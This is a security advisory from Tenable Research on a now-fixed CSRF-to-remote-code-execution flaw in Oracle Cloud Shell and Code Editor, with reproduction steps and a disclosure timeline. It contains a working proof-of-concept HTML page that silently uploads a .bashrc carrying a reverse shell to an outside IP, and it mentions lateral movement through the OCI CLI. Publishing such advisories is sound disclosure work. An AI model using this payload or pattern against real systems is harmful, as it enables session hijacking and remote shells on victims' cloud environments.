Facebook Google Plus Twitter LinkedIn YouTube RSS Menu Search Resource - BlogResource - WebinarResource - ReportResource - Eventicons_066 icons_067icons_068icons_069icons_070

Oracle Cloud Remote Code Execution Vulnerability on Cloud Shell and Code Editor's integrated services

High
← View More Research Advisories

Synopsis

Tenable Research discovered a Remote Code Execution (RCE) vulnerability (now remediated) in Oracle Cloud Infrastructure’s (OCI) Code Editor - a service designed for developers working within Oracle’s Cloud Shell ecosystem. By chaining together subtle misconfigurations, we demonstrated how an attacker could silently 1-click hijack a victim’s Cloud Shell environment and potentially pivot across OCI services. Attackers could also abuse the vulnerability to exploit Code Editor’s integrated services such as Resource Manager, Functions and Data Science.

 

The vulnerability is achieved through CSRF (Cross-site request forgery) on the Cloud Shell’s router domain. By abusing the vulnerability, attackers can deploy or overwrite the victim’s Cloud Shell files with a malicious payload to then take over the victim’s service.

Attack details:

  1. The router upload works with cookie authentication, and the “CS-ProxyChallenge” cookie’s same-site attribute is set to None under the router.cloudshell.us-ashburn-1.oci.oraclecloud.com domain. The Same-Site attribute is a browser security feature introduced in 2016; its default value is set to "Lax". The purpose of the Same-Site attribute is to protect against cross-origin information leakage/attacks, e.g. cross-site request forgery (CSRF). According to the request for comments (RFC), the "None" value in the Same-Site attribute provides no protection against cross-origin attacks.
  2. The upload works with a multipart/form-data content type which is one of the 3 content types accepted by the browser for a cross-origin request.
  3. The request is an http “POST” request which is also valid by the browser with a cross-origin request, and does not require any additional custom headers.
  4. With this kind of an http request and not any additional defenses against a cross-origin/CSRF attack, attackers can abuse this request to upload malicious files to Cloud Shell on behalf of the victim.

Steps to reproduce:

  1. Host a server
  2. Create a malicious HTML file that sends a request with javascript to the vulnerable file-upload endpoint  (see our example code below)
  3. The authenticated victim navigates to your payload on the hosted server then works with Oracle’s Cloud Shell regularly 
  4. The .bashrc file runs on shell initialization and you can run code on the victim’s Cloud Shell
  5. Optional: use the OCI CLI to abuse the correlated Oracle Cloud’s identity and laterally move to other cloud services

POC code:

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>TCS Research POC</title>
    <script>
        function submitForm() {
            var xhr = new XMLHttpRequest();
            var boundary = "random";
            var url = "https://router.cloudshell.us-ashburn-1.oci.oraclecloud.com/file-upload";
            var fileData = `# .bashrc
if [ -f /etc/bashrc ]; then
    . /etc/bashrc
fi

source /etc/bashrc.cloudshell
bash -i >& /dev/tcp/35.11.123.123/4040 0>&1`;
            var fileName = "refxss.html";
            var nameVar = "file";
            var filePath = "file:///home/lmatan/.bashrc";
            var boundaryPrefix = "----webkitformboundary";
            var body = "--" + boundaryPrefix + boundary + "\r\n";
            body += 'Content-Disposition: form-data; name="uri"\r\n\r\n';
            body += filePath + "\r\n";
            body += "--" + boundaryPrefix + boundary + "\r\n";
            body += 'Content-Disposition: form-data; name="' + nameVar + '"; filename="' + fileName + '"\r\n';
            body += "Content-Type: text/html\r\n\r\n";
            body += fileData + "\r\n";
            body += "--" + boundaryPrefix + boundary + "--\r\n";
            var blob = new Blob([body], { type: "multipart/form-data; boundary=" + boundaryPrefix + boundary });
            xhr.open("POST", url, true);
            xhr.withCredentials = true;
            xhr.send(blob);
        }
        window.onload = submitForm;
    </script>
</head>
<body>
    <h1>TCS Research RCE POC</h1>
    <p>...</p>
</body>
</html>

We are publishing this report ahead of Oracle’s scheduled July CPU as we have observed and confirmed with Oracle that the issue is fixed.

Solution

In response to this discovery, Oracle Cloud fixed the vulnerability by requiring a custom header x-csrf-token:csrf-value.

Disclosure Timeline

March 16, 2025 - Tenable reported the finding to Oracle
March 17, 2025 - Oracle acknowledges
March 18, 2025 - Oracle assigns a tracking number to the issue and Tenable acknowledges
March 24, 2025 - Oracle sends a status report - Under investigation / Being addressed in underlying software
April 8, 2025 - Tenable asks for the investigation status
April 9, 2025 - Oracle asks for the POC video again, Tenable attaches
April 10, 2025 - Oracle asks to delay disclosure to July because of missing information
April 18, 2025 - Oracle is unable to reproduce the issue and asks for clarification
April 19, 2025 - Tenable clarifies the issue and reproduced it again successfully
April 24, 2025 - Oracle sends a status report - Under investigation / Being addressed in underlying software
May 7, 2025 - Tenable asks for an update on the issue
May 8, 2025 - Oracle says they fixed this issue and deployment is in progress
May 19, 2025 - Tenable asks for an update on the issue
May 19, 2025 - Oracle says they fixed this issue and deployment is in progress
May 20, 2025 - Tenable can no longer reproduce the vulnerability and reminds Oracle that we intend to publicly disclose on June 14
May 21, 2025 - Oracle requests a disclosure delay to July 25
May 30, 2025 - Tenable requests a call to discuss the disclosure
June 6, 2025 - Oracle replies explaining their process.
June 10, 2025 - Tenable replies that we intend to publish as previously indicated since the issue appears to be fixed.
June 11, 2025: Oracle replies acknowledging.

All information within TRA advisories is provided “as is”, without warranty of any kind, including the implied warranties of merchantability and fitness for a particular purpose, and with no guarantee of completeness, accuracy, or timeliness. Individuals and organizations are responsible for assessing the impact of any actual or potential security vulnerability.

Tenable takes product security very seriously. If you believe you have found a vulnerability in one of our products, we ask that you please work with us to quickly resolve it in order to protect customers. Tenable believes in responding quickly to such reports, maintaining communication with researchers, and providing a solution in short order.

For more details on submitting vulnerability information, please see our Vulnerability Reporting Guidelines page.

If you have questions or corrections about this advisory, please email [email protected]

Risk Information

Tenable Advisory ID: TRA-2025-19
Credit:
Liv Matan
Affected Products:
Oracle Cloud’s Cloud Shell
Oracle Cloud Code Editor
Oracle Cloud Resource Manager
Oracle Cloud Functions
Oracle Cloud Data Science
Risk Factor:
High

Advisory Timeline

June 16, 2025 - Initial release.
Try for free Buy now

Tenable Vulnerability Management

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy.

Your Tenable Vulnerability Management trial also includes Tenable Web App Scanning.

Tenable Vulnerability Management

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy. Purchase your annual subscription today.

100 assets

Choose your subscription option:

Buy Now
Try for free Buy now

Tenable Vulnerability Management

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy.

Your Tenable Vulnerability Management trial also includes Tenable Web App Scanning.

Tenable Vulnerability Management

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy. Purchase your annual subscription today.

100 assets

Choose your subscription option:

Buy Now
Try for free Buy now

Tenable Vulnerability Management

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy.

Your Tenable Vulnerability Management trial also includes Tenable Web App Scanning.

Tenable Vulnerability Management

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy. Purchase your annual subscription today.

100 assets

Choose your subscription option:

Buy Now
Try for free Buy now

Try Tenable Web App Scanning

Enjoy full access to our latest web application scanning offering designed for modern applications as part of the Tenable One Exposure Management platform. Safely scan your entire online portfolio for vulnerabilities with a high degree of accuracy without heavy manual effort or disruption to critical web applications. Sign up now.

Your Tenable Web App Scanning trial also includes Tenable Vulnerability Management.

Buy Tenable Web App Scanning

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy. Purchase your annual subscription today.

5 FQDNs

$3,578

Buy Now

Request a demo of Tenable Security Center

Please fill out this form with your contact information.

A sales representative will contact you shortly to schedule a demo.

* Field is required

Request a demo of Tenable OT Security

Get the Operational Technology security you need.

Reduce the risk you don’t.

Request a demo

Don’t wait for an attack--eliminate risks before they’re exploited.

  • Uncover hidden weaknesses
  • Stop threats before they strike
  • Simplify security
  • Secure hybrid environments

Request a demo of Tenable Cloud Security

Exceptional unified cloud security awaits you!

We’ll show you exactly how Tenable Cloud Security helps you deliver multi-cloud asset discovery, prioritized risk assessments and automated compliance/audit reports.

See
Tenable One
in action

Exposure management for the modern attack surface.

See Tenable Attack Surface Management in action

Know the exposure of every asset on any platform.

Get a demo of Tenable Enclave Security

Please fill out the form with your contact information and a sales representative will contact you shortly to schedule a demo.

Try for free Buy now

Try Tenable Nessus Professional free

Tenable Nessus is the most comprehensive vulnerability scanner on the market today.

NEW - Tenable Nessus Expert
now available

Nessus Expert adds even more features, including external attack surface scanning, and the ability to add domains and scan cloud infrastructure. Click here to Try Nessus Expert.

Fill out the form below to continue with a Nessus Pro trial.

Buy Tenable Nessus Professional

Tenable Nessus is the most comprehensive vulnerability scanner on the market today. Tenable Nessus Professional will help automate the vulnerability scanning process, save time in your compliance cycles and allow you to engage your IT team.

Buy a multi-year license and save. Add Advanced Support for access to phone, community and chat support 24 hours a day, 365 days a year.

Select your license

Buy a multi-year license and save.

Add support and training
Buy Now
Renew an existing license Find a reseller
Try for free Buy now

Try Tenable Nessus Expert free

Built for the modern attack surface, Nessus Expert enables you to see more and protect your organization from vulnerabilities from IT to the cloud.

Already have Tenable Nessus Professional?
Upgrade to Nessus Expert free for 7 days.

Buy Tenable Nessus Expert

Built for the modern attack surface, Nessus Expert enables you to see more and protect your organization from vulnerabilities from IT to the cloud.

Select your license

Buy a multi-year license and save more.

Add support and training
Buy Now
Renew an existing license Find a reseller

Get a demo of Tenable Patch Management

Interested in streamlining security and IT collaboration and shortening the mean time to remediate with automation? Try Tenable Patch Management.